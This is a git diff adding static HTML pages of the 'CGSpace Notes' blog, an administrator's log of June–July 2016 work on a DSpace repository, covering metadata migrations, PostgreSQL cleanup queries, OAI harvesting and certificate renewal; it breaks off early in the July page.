+<li>Clean up and import ~65 more CTA items into CGSpace</li>
+</ul>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2016-06/index.html b/docs/2016-06/index.html
new file mode 100644
index 000000000..3657623e8
--- /dev/null
+++ b/docs/2016-06/index.html
@@ -0,0 +1,463 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="June, 2016" />
+<meta property="og:description" content="2016-06-01
+
+Experimenting with IFPRI OAI (we want to harvest their publications)
+After reading the ContentDM documentation I found IFPRI&rsquo;s OAI endpoint: http://ebrary.ifpri.org/oai/oai.php
+After reading the OAI documentation and testing with an OAI validator I found out how to get their publications
+This is their publications set: http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;from=2016-01-01&amp;set=p15738coll2&amp;metadataPrefix=oai_dc
+You can see the others by using the OAI ListSets verb: http://ebrary.ifpri.org/oai/oai.php?verb=ListSets
+Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in dc.identifier.fund to cg.identifier.cpwfproject and then the rest to dc.description.sponsorship
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2016-06/" />
+<meta property="article:published_time" content="2016-06-01T10:53:00+03:00" />
+<meta property="article:modified_time" content="2020-11-30T12:10:20+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="June, 2016"/>
+<meta name="twitter:description" content="2016-06-01
+
+Experimenting with IFPRI OAI (we want to harvest their publications)
+After reading the ContentDM documentation I found IFPRI&rsquo;s OAI endpoint: http://ebrary.ifpri.org/oai/oai.php
+After reading the OAI documentation and testing with an OAI validator I found out how to get their publications
+This is their publications set: http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;from=2016-01-01&amp;set=p15738coll2&amp;metadataPrefix=oai_dc
+You can see the others by using the OAI ListSets verb: http://ebrary.ifpri.org/oai/oai.php?verb=ListSets
+Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in dc.identifier.fund to cg.identifier.cpwfproject and then the rest to dc.description.sponsorship
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "June, 2016",
+  "url": "https://alanorth.github.io/cgspace-notes/2016-06/",
+  "wordCount": "1551",
+  "datePublished": "2016-06-01T10:53:00+03:00",
+  "dateModified": "2020-11-30T12:10:20+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2016-06/">
+
+    <title>June, 2016 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-06/">June, 2016</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2016-06-01T10:53:00+03:00">Wed Jun 01, 2016</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-06-01">2016-06-01</h2>
+<ul>
+<li>Experimenting with IFPRI OAI (we want to harvest their publications)</li>
+<li>After reading the <a href="https://www.oclc.org/support/services/contentdm/help/server-admin-help/oai-support.en.html">ContentDM documentation</a> I found IFPRI&rsquo;s OAI endpoint: <a href="http://ebrary.ifpri.org/oai/oai.php">http://ebrary.ifpri.org/oai/oai.php</a></li>
+<li>After reading the <a href="https://www.openarchives.org/OAI/openarchivesprotocol.html">OAI documentation</a> and testing with an <a href="http://validator.oaipmh.com/">OAI validator</a> I found out how to get their publications</li>
+<li>This is their publications set: <a href="http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;from=2016-01-01&amp;set=p15738coll2&amp;metadataPrefix=oai_dc">http://ebrary.ifpri.org/oai/oai.php?verb=ListRecords&amp;from=2016-01-01&amp;set=p15738coll2&amp;metadataPrefix=oai_dc</a></li>
+<li>You can see the others by using the OAI <code>ListSets</code> verb: <a href="http://ebrary.ifpri.org/oai/oai.php?verb=ListSets">http://ebrary.ifpri.org/oai/oai.php?verb=ListSets</a></li>
+<li>Working on second phase of metadata migration, looks like this will work for moving CPWF-specific data in <code>dc.identifier.fund</code> to <code>cg.identifier.cpwfproject</code> and then the rest to <code>dc.description.sponsorship</code></li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# update metadatavalue set metadata_field_id=130 where metadata_field_id=75 and (text_value like &#39;PN%&#39; or text_value like &#39;PHASE%&#39; or text_value = &#39;CBA&#39; or text_value = &#39;IA&#39;);
+UPDATE 497
+dspacetest=# update metadatavalue set metadata_field_id=29 where metadata_field_id=75;
+UPDATE 14
+</code></pre><ul>
+<li>Fix a few minor miscellaneous issues in <code>dspace.cfg</code> (<a href="https://github.com/ilri/DSpace/pull/227">#227</a>)</li>
+</ul>
+<h2 id="2016-06-02">2016-06-02</h2>
+<ul>
+<li>Testing the configuration and theme changes for the upcoming metadata migration and I found some issues with <code>cg.coverage.admin-unit</code></li>
+<li>Seems that the Browse configuration in <code>dspace.cfg</code> can&rsquo;t handle the &lsquo;-&rsquo; in the field name:</li>
+</ul>
+<pre tabindex="0"><code>webui.browse.index.12 = subregion:metadata:cg.coverage.admin-unit:text
+</code></pre><ul>
+<li>But actually, I think since DSpace 4 or 5 (we are 5.1) the Browse indexes come from Discovery (defined in discovery.xml) so this is really just a parsing error</li>
+<li>I&rsquo;ve sent a message to the DSpace mailing list to ask about the Browse index definition</li>
+<li>A user was having problems with submission and from the stacktrace it looks like a Sherpa/Romeo issue</li>
+<li>I found a thread on the mailing list talking about it and there is bug report and a patch: <a href="https://jira.duraspace.org/browse/DS-2740">https://jira.duraspace.org/browse/DS-2740</a></li>
+<li>The patch applies successfully on DSpace 5.1 so I will try it later</li>
+</ul>
+<h2 id="2016-06-03">2016-06-03</h2>
+<ul>
+<li>Investigating the CCAFS authority issue, I exported the metadata for the Videos collection</li>
+<li>The top two authors are:</li>
+</ul>
+<pre tabindex="0"><code>CGIAR Research Program on Climate Change, Agriculture and Food Security::acd00765-02f1-4b5b-92fa-bfa3877229ce::500
+CGIAR Research Program on Climate Change, Agriculture and Food Security::acd00765-02f1-4b5b-92fa-bfa3877229ce::600
+</code></pre><ul>
+<li>So the only difference is the &ldquo;confidence&rdquo;</li>
+<li>Ok, well THAT is interesting:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# select text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like &#39;%Orth, %&#39;;
+ text_value |              authority               | confidence
+------------+--------------------------------------+------------
+ Orth, A.   | ab606e3a-2b04-4c7d-9423-14beccf54257 |         -1
+ Orth, A.   | ab606e3a-2b04-4c7d-9423-14beccf54257 |         -1
+ Orth, A.   | ab606e3a-2b04-4c7d-9423-14beccf54257 |         -1
+ Orth, Alan |                                      |         -1
+ Orth, Alan |                                      |         -1
+ Orth, Alan |                                      |         -1
+ Orth, Alan |                                      |         -1
+ Orth, A.   | 05c2c622-d252-4efb-b9ed-95a07d3adf11 |         -1
+ Orth, A.   | 05c2c622-d252-4efb-b9ed-95a07d3adf11 |         -1
+ Orth, A.   | ab606e3a-2b04-4c7d-9423-14beccf54257 |         -1
+ Orth, A.   | ab606e3a-2b04-4c7d-9423-14beccf54257 |         -1
+ Orth, Alan | ad281dbf-ef81-4007-96c3-a7f5d2eaa6d9 |        600
+ Orth, Alan | ad281dbf-ef81-4007-96c3-a7f5d2eaa6d9 |        600
+(13 rows)
+</code></pre><ul>
+<li>And now an actually relevent example:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39; and confidence = 500;
+ count
+-------
+   707
+(1 row)
+
+dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39; and confidence != 500;
+ count
+-------
+   253
+(1 row)
+</code></pre><ul>
+<li>Trying something experimental:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# update metadatavalue set confidence=500 where metadata_field_id=3 and text_value like &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39;;
+UPDATE 960
+</code></pre><ul>
+<li>And then re-indexing authority and Discovery&hellip;?</li>
+<li>After Discovery reindex the CCAFS authors are all together in the Authors sidebar facet</li>
+<li>The docs for the ORCiD and Authority stuff for DSpace 5 mention changing the browse indexes to use the Authority as well:</li>
+</ul>
+<pre tabindex="0"><code>webui.browse.index.2 = author:metadataAuthority:dc.contributor.author:authority
+</code></pre><ul>
+<li>That would only be for the &ldquo;Browse by&rdquo; function&hellip; so we&rsquo;ll have to see what effect that has later</li>
+</ul>
+<h2 id="2016-06-04">2016-06-04</h2>
+<ul>
+<li>Re-sync DSpace Test with CGSpace and perform test of metadata migration again</li>
+<li>Run phase two of metadata migrations on CGSpace (see the <a href="https://gist.github.com/alanorth/1a730bec5ac9457a8fb0e3e72c98d09c">migration notes</a>)</li>
+<li>Run all system updates and reboot CGSpace server</li>
+</ul>
+<h2 id="2016-06-07">2016-06-07</h2>
+<ul>
+<li>Figured out how to export a list of the unique values from a metadata field ordered by count:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=29 group by text_value order by count desc) to /tmp/sponsorship.csv with csv;
+</code></pre><ul>
+<li>
+<p>Identified the next round of fields to migrate:</p>
+<ul>
+<li>dc.title.jtitle	→	dc.source</li>
+<li>dc.crsubject.crpsubject →	cg.contributor.crp</li>
+<li>dc.contributor.affiliation →	cg.contributor.affiliation</li>
+<li>dc.Species →	cg.species</li>
+<li>dc.contributor.corporate	→	dc.contributor</li>
+<li>dc.identifier.url	→	cg.identifier.url</li>
+<li>dc.identifier.doi	→	cg.identifier.doi</li>
+<li>dc.identifier.googleurl	→	cg.identifier.googleurl</li>
+<li>dc.identifier.dataurl	→	cg.identifier.dataurl</li>
+</ul>
+</li>
+<li>
+<p>Discuss pulling data from IFPRI&rsquo;s ContentDM with Ryan Miller</p>
+</li>
+<li>
+<p>Looks like OAI is kinda obtuse for this, and if we use ContentDM&rsquo;s API we&rsquo;ll be able to access their internal field names (rather than trying to figure out how they stuffed them into various, repeated Dublin Core fields)</p>
+</li>
+</ul>
+<h2 id="2016-06-08">2016-06-08</h2>
+<ul>
+<li>Discuss controlled vocabularies for ~28 fields</li>
+<li>Looks like this is all we need: <a href="https://wiki.lyrasis.org/display/DSDOC5x/Submission+User+Interface#SubmissionUserInterface-ConfiguringControlledVocabularies">https://wiki.lyrasis.org/display/DSDOC5x/Submission+User+Interface#SubmissionUserInterface-ConfiguringControlledVocabularies</a></li>
+<li>I wrote an XPath expression to extract the ILRI subjects from <code>input-forms.xml</code> (from the xmlstarlet package):</li>
+</ul>
+<pre tabindex="0"><code>$ xml sel -t -m &#39;//value-pairs[@value-pairs-name=&#34;ilrisubject&#34;]/pair/displayed-value/text()&#39; -c &#39;.&#39; -n dspace/config/input-forms.xml
+</code></pre><ul>
+<li>Write to Atmire about the use of <code>atmire.orcid.id</code> to see if we can change it</li>
+<li>Seems to be a virtual field that is queried from the authority cache&hellip; hmm</li>
+<li>In other news, I found out that the About page that we haven&rsquo;t been using lives in <code>dspace/config/about.xml</code>, so now we can update the text</li>
+<li>File bug about <code>closed=&quot;true&quot;</code> attribute of controlled vocabularies not working: <a href="https://jira.duraspace.org/browse/DS-3238">https://jira.duraspace.org/browse/DS-3238</a></li>
+</ul>
+<h2 id="2016-06-09">2016-06-09</h2>
+<ul>
+<li>Atmire explained that the <code>atmire.orcid.id</code> field doesn&rsquo;t exist in the schema, as it actually comes from the authority cache during XMLUI run time</li>
+<li>This means we don&rsquo;t see it when harvesting via OAI or REST, for example</li>
+<li>They opened a feature ticket on the DSpace tracker to ask for support of this: <a href="https://jira.duraspace.org/browse/DS-3239">https://jira.duraspace.org/browse/DS-3239</a></li>
+</ul>
+<h2 id="2016-06-10">2016-06-10</h2>
+<ul>
+<li>Investigating authority confidences</li>
+<li>It looks like the values are documented in <code>Choices.java</code></li>
+<li>Experiment with setting all 960 CCAFS author values to be 500:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# SELECT authority, confidence FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value = &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39;;
+
+dspacetest=# UPDATE metadatavalue set confidence = 500 where resource_type_id=2 AND metadata_field_id=3 AND text_value = &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39;;
+UPDATE 960
+</code></pre><ul>
+<li>After the database edit, I did a full Discovery re-index</li>
+<li>And now there are exactly 960 items in the authors facet for &lsquo;CGIAR Research Program on Climate Change, Agriculture and Food Security&rsquo;</li>
+<li>Now I ran the same on CGSpace</li>
+<li>Merge controlled vocabulary functionality for animal breeds to <code>5_x-prod</code> (<a href="https://github.com/ilri/DSpace/pull/236">#236</a>)</li>
+<li>Write python script to update metadata values in batch via PostgreSQL: <a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a></li>
+<li>We need to use this to correct some pretty ugly values in fields like <code>dc.description.sponsorship</code></li>
+<li>Merge item display tweaks from earlier this week (<a href="https://github.com/ilri/DSpace/pull/231">#231</a>)</li>
+<li>Merge controlled vocabulary functionality for subregions (<a href="https://github.com/ilri/DSpace/pull/238">#238</a>)</li>
+</ul>
+<h2 id="2016-06-11">2016-06-11</h2>
+<ul>
+<li>Merge controlled vocabulary for sponsorship field (<a href="https://github.com/ilri/DSpace/pull/239">#239</a>)</li>
+<li>Fix character encoding issues for animal breed lookup that I merged yesterday</li>
+</ul>
+<h2 id="2016-06-17">2016-06-17</h2>
+<ul>
+<li>Linode has free RAM upgrades for their 13th birthday so I migrated DSpace Test (4→8GB of RAM)</li>
+</ul>
+<h2 id="2016-06-18">2016-06-18</h2>
+<ul>
+<li>
+<p>Clean up titles and hints in <code>input-forms.xml</code> to use title/sentence case and a few more consistency things (<a href="https://github.com/ilri/DSpace/pull/241">#241</a>)</p>
+</li>
+<li>
+<p>The final list of fields to migrate in the third phase of metadata migrations is:</p>
+<ul>
+<li>dc.title.jtitle	→	dc.source</li>
+<li>dc.crsubject.crpsubject →	cg.contributor.crp</li>
+<li>dc.contributor.affiliation →	cg.contributor.affiliation</li>
+<li>dc.srplace.subregion →	cg.coverage.subregion</li>
+<li>dc.Species →	cg.species</li>
+<li>dc.contributor.corporate	→	dc.contributor</li>
+<li>dc.identifier.url	→	cg.identifier.url</li>
+<li>dc.identifier.doi	→	cg.identifier.doi</li>
+<li>dc.identifier.googleurl	→	cg.identifier.googleurl</li>
+<li>dc.identifier.dataurl	→	cg.identifier.dataurl</li>
+</ul>
+</li>
+<li>
+<p>Interesting &ldquo;Sunburst&rdquo; visualization on a Digital Commons page: <a href="http://www.repository.law.indiana.edu/sunburst.html">http://www.repository.law.indiana.edu/sunburst.html</a></p>
+</li>
+<li>
+<p>Final testing on metadata fix/delete for <code>dc.description.sponsorship</code> cleanup</p>
+</li>
+<li>
+<p>Need to run <code>fix-metadata-values.py</code> and then <code>fix-metadata-values.py</code></p>
+</li>
+</ul>
+<h2 id="2016-06-20">2016-06-20</h2>
+<ul>
+<li>CGSpace&rsquo;s HTTPS certificate expired last night and I didn&rsquo;t notice, had to renew:</li>
+</ul>
+<pre tabindex="0"><code># /opt/letsencrypt/letsencrypt-auto renew --standalone --pre-hook &#34;/usr/bin/service nginx stop&#34; --post-hook &#34;/usr/bin/service nginx start&#34;
+</code></pre><ul>
+<li>I really need to fix that cron job&hellip;</li>
+</ul>
+<h2 id="2016-06-24">2016-06-24</h2>
+<ul>
+<li>Run the replacements/deletes for <code>dc.description.sponsorship</code> (investors) on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i investors-not-blank-not-delete-85.csv -f dc.description.sponsorship -t &#39;correct investor&#39; -m 29 -d cgspace -p &#39;fuuu&#39; -u cgspace
+$ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.sponsorship -m 29 -d cgspace -p &#39;fuuu&#39; -u cgspace
+</code></pre><ul>
+<li>The scripts for this are here:
+<ul>
+<li><a href="https://gist.github.com/alanorth/df92cbfb54d762ba21b28f7cd83b6897">fix-metadata-values.py</a></li>
+<li><a href="https://gist.github.com/alanorth/bd7d58c947f686401a2b1fadc78736be">delete-metadata-values.py</a></li>
+</ul>
+</li>
+<li>Add new sponsors to controlled vocabulary (<a href="https://github.com/ilri/DSpace/pull/244">#244</a>)</li>
+<li>Refine submission form labels and hints</li>
+</ul>
+<h2 id="2016-06-28">2016-06-28</h2>
+<ul>
+<li>Testing the cleanup of <code>dc.contributor.corporate</code> with 13 deletions and 121 replacements</li>
+<li>There are still ~97 fields that weren&rsquo;t indicated to do anything</li>
+<li>After the above deletions and replacements I regenerated a CSV and sent it to Peter <em>et al</em> to have a look</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=126 group by text_value order by count desc) to /tmp/contributors-june28.csv with csv;
+</code></pre><ul>
+<li>Re-evaluate <code>dc.contributor.corporate</code> and it seems we will move it to <code>dc.contributor.author</code> as this is more in line with how editors are actually using it</li>
+</ul>
+<h2 id="2016-06-29">2016-06-29</h2>
+<ul>
+<li>Test run of <code>migrate-fields.sh</code> with the following re-mappings:</li>
+</ul>
+<pre tabindex="0"><code>72  55  #dc.source
+86  230 #cg.contributor.crp
+91  211 #cg.contributor.affiliation
+94  212 #cg.species
+107 231 #cg.coverage.subregion
+126 3   #dc.contributor.author
+73  219 #cg.identifier.url
+74  220 #cg.identifier.doi
+79  222 #cg.identifier.googleurl
+89  223 #cg.identifier.dataurl
+</code></pre><ul>
+<li>Run all cleanups and deletions of <code>dc.contributor.corporate</code> on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Corporate-Authors-Fix-121.csv -f dc.contributor.corporate -t &#39;Correct style&#39; -m 126 -d cgspace -u cgspace -p &#39;fuuu&#39;
+$ ./fix-metadata-values.py -i Corporate-Authors-Fix-PB.csv -f dc.contributor.corporate -t &#39;should be&#39; -m 126 -d cgspace -u cgspace -p &#39;fuuu&#39;
+$ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-Delete-13.csv -m 126 -u cgspace -d cgspace -p &#39;fuuu&#39;
+</code></pre><ul>
+<li>Re-deploy CGSpace and DSpace Test with latest June changes</li>
+<li>Now the sharing and Altmetric bits are more prominent:</li>
+</ul>
+<p><img src="/cgspace-notes/2016/06/xmlui-altmetric-sharing.png" alt="DSpace 5.1 XMLUI With Altmetric Badge"></p>
+<ul>
+<li>Run all system updates on the servers and reboot</li>
+<li>Start working on config changes for phase three of the metadata migrations</li>
+</ul>
+<h2 id="2016-06-30">2016-06-30</h2>
+<ul>
+<li>Wow, there are 95 authors in the database who have &lsquo;,&rsquo; at the end of their name:</li>
+</ul>
+<pre tabindex="0"><code># select text_value from  metadatavalue where metadata_field_id=3 and text_value like &#39;%,&#39;;
+</code></pre><ul>
+<li>We need to use something like this to fix them, need to write a proper regex later:</li>
+</ul>
+<pre tabindex="0"><code># update metadatavalue set text_value = regexp_replace(text_value, &#39;(Poole, J),&#39;, &#39;\1&#39;) where metadata_field_id=3 and text_value = &#39;Poole, J,&#39;;
+</code></pre>
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2016-07/index.html b/docs/2016-07/index.html
new file mode 100644
index 000000000..fd87dbf93
--- /dev/null
+++ b/docs/2016-07/index.html
@@ -0,0 +1,379 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="July, 2016" />
+<meta property="og:description" content="2016-07-01
+
+Add dc.description.sponsorship to Discovery sidebar facets and make investors clickable in item view (#232)
+I think this query should find and replace all authors that have &ldquo;,&rdquo; at the end of their names:
+
+dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.&#43;?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.&#43;?,$&#39;;
+UPDATE 95
+dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.&#43;?,$&#39;;
+ text_value
+------------
+(0 rows)
+
+In this case the select query was showing 95 results before the update
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2016-07/" />
+<meta property="article:published_time" content="2016-07-01T10:53:00+03:00" />
+<meta property="article:modified_time" content="2018-03-09T22:10:33+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="July, 2016"/>
+<meta name="twitter:description" content="2016-07-01
+
+Add dc.description.sponsorship to Discovery sidebar facets and make investors clickable in item view (#232)
+I think this query should find and replace all authors that have &ldquo;,&rdquo; at the end of their names:
+
+dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.&#43;?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.&#43;?,$&#39;;
+UPDATE 95
+dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.&#43;?,$&#39;;
+ text_value
+------------
+(0 rows)
+
+In this case the select query was showing 95 results before the update
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "July, 2016",
+  "url": "https://alanorth.github.io/cgspace-notes/2016-07/",
+  "wordCount": "866",
+  "datePublished": "2016-07-01T10:53:00+03:00",
+  "dateModified": "2018-03-09T22:10:33+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2016-07/">
+
+    <title>July, 2016 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2016-07/">July, 2016</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2016-07-01T10:53:00+03:00">Fri Jul 01, 2016</time>
+ in 
+
+<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
+
+</p>
+  </header>
+  <h2 id="2016-07-01">2016-07-01</h2>
+<ul>
+<li>Add <code>dc.description.sponsorship</code> to Discovery sidebar facets and make investors clickable in item view (<a href="https://github.com/ilri/DSpace/issues/232">#232</a>)</li>
+<li>I think this query should find and replace all authors that have &ldquo;,&rdquo; at the end of their names:</li>
+</ul>
+<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.+?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
+UPDATE 95
+dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
+ text_value
+------------
+(0 rows)
+</code></pre><ul>
+<li>In this case the select query was showing 95 results before the update</li>
+</ul>
+<h2 id="2016-07-02">2016-07-02</h2>
+<ul>
+<li>Comment on DSpace Jira ticket about author lookup search text (<a href="https://jira.duraspace.org/browse/DS-2329">DS-2329</a>)</li>
+</ul>
+<h2 id="2016-07-04">2016-07-04</h2>
+<ul>
+<li>Seems the database&rsquo;s author authority values mean nothing without the <code>authority</code> Solr core from the host where they were created!</li>
+</ul>
+<h2 id="2016-07-05">2016-07-05</h2>
+<ul>
